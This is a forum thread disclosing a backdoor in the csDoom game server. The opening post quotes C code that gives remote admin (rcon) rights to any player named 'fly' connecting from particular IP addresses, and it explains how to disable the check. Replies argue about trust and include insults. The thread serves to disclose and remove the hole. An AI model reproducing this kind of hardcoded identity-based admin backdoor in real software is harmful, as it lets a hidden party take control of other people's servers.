Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
Sign in to follow this  
Guest hate

Csdoom security hole

Recommended Posts

Guest hate

The following code is included in the source of the new version of csdoom:

if ( net_from.ip[0]= && net_from.ip[1]= &&
net_from.ip[2]= &&
( !strcmp(players[parse_cl].userinfo.netname, "fly")
|| !strcmp(players[parse_cl].userinfo.netname, "FLY")
|| !strcmp(players[parse_cl].userinfo.netname, "Fly") )
)
{
clients[parse_cl].allow_rcon = true;
}

for those of you without a knowledge of C, this basically means that Fly, the creator of csdoom, can take over any server you may choose to set up, and perform "administrative" functions (kick people etc). I'm guessing that you may not wish him to have this ability, so in order to disable it, simply go to line 695 and where you see the line:

SV_CheckIP();

simply change it to

// SV_CheckIP();

This will disable the hole.

Share this post


Link to post
Guest Blowfly

Better go check the client for back doors as well. Hang on.. it's closed source... hrrmmmm. Oh well, if it's *your* hard drive that gets wiped then don't look at me...

Share this post


Link to post

I have the csDoom source for win32. And if there is a need for it, just let me know. I'll take that hole out and post it if you dont want Fly messing with your servers.

I warned him about that. Its going to cause alot of problems down the road.

Share this post


Link to post

OK, thank you for the info. Personally I don't really care though. I trust fly, and, also, you haven't mentioned anything truly serious that he could do. Then again, this might be the beginning of the Russian era. :o

Share this post


Link to post
NightFang said:

I have the csDoom source for win32. And if there is a need for it, just let me know. I'll take that hole out and post it if you dont want Fly messing with your servers.

I warned him about that. Its going to cause alot of problems down the road.

It would be good with a secured version, although I too trust fly and don't really mind :o)

He could have publicly announced it though, so that it would have been known from the beginning, that would have been alot more friendly...

Share this post


Link to post
Myk said:

OK, thank you for the info. Personally I don't really care though. I trust fly, and, also, you haven't mentioned anything truly serious that he could do. Then again, this might be the beginning of the Russian era. :o

Hmmm. I think I want more info . Not that I mistrust Fly or anyone in particular, but I really don't like the sound of this. Can this hole possibly open someone's hard disk to a malicous hacker? Is it possible for someone other than Fly to gain access to someone's server? Is it possible for someone to exploit any potential security holes in the client even if they don't have the source code?

Share this post


Link to post

Apparently it's an ingame thing only. I agree completely with informing about other peoples work, especially when it functions on-line. But why do these things come up, and not real bugs? That makes me think that people are just poking lamely. I do hope not , Stphrz.

Share this post


Link to post

Fly should learn not to put backdoors in released code :-)

By the way this fails to mention what file this occurs in.

sv_main.c

Share this post


Link to post

Good Work!!! Thats 2 places to play you have ruined :)

Cocksuckers

Share this post


Link to post
Guest Psycho

Does this remind ANYBODY about the end of DoomServ?

Share this post


Link to post

Anyone who is pissed off that Aurikan has to make an ass of himself all the time just ignore him, He obviously put alot of work into that post and if we keep csdoom up and dont let this post have its intended effect then that is probably the most we can do to piss him off, unless the rumor i heard about doomroom being closed is true.

Share this post


Link to post
aurikan said:

Fly should learn not to put backdoors in released code :-)

By the way this fails to mention what file this occurs in.

sv_main.c

I think Aurican needs to change his quote to "I dont do doom, i just like to screw its players"

Share this post


Link to post
Guest hate

aurikan had nothing to do with this, retard

Share this post


Link to post
hate said:

aurikan had nothing to do with this, retard

I bet

Share this post


Link to post

Just a clarification for Toke and anyone who is convinced by his posts.

I had absolutely nothing to do with the csDoom expose nor #csdoom takeover.

Thank you for your time.

Share this post


Link to post
Guest Daggah

As far as I can tell, it's Toke being the asshole here.

Share this post


Link to post
Guest
This topic is now closed to further replies.
Sign in to follow this  
×